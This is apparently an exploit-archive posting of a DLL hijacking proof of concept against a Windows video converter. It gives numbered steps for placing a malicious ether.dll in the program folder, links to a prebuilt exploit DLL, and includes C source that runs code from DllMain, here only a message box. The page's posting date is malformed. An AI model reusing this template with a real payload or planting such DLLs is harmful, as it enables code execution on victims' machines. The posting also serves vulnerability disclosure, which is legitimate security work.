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Easy Video to iPod/MP4/PSP/3GP Converter DLL Hijacking Exploit ether.dll

Posted on 30 November -0001

<HTML><HEAD><TITLE>Easy Video to iPod/MP4/PSP/3GP Converter DLL Hijacking Exploit (ether.dll)</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: Easy Video to iPod/MP4/PSP/3GP Converter DLL Hijacking Exploit (ether.dll) # Date: 2016-09-24 # Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com # Vendor Homepage: http://www.divxtodvd.net/ipod-mp4-psp-3gp.htm # Software Download Link: http://www.divxtodvd.net/easy_ipod_mp4_psp_3gp.exe # Demo Download Test : http://s8.picofile.com/file/8268480084/Easy_iPod_MP4_PSP_3GP.rar.html # Dll Exploit Download File : http://s8.picofile.com/file/8268480242/ether.rar.html # Version: All Version # Tested on: Windows 10 Exploit : 1. Compile dll and rename to ether.dll 2. Copy ether.dll to C:Program Files (x86)Easy iPod MP4 PSP 3GP 3. Launch Easy Video to iPod MP4 PSP 3GP Converter.exe 4. MessageBox Executed #include <windows.h> #define DllExport __declspec (dllexport) BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { dll_hijack(); return 0; } int dll_hijack() { MessageBoxA(0, "DLL Hijacking!", "DLL Message", MB_OK); return 0; } </BODY></HTML>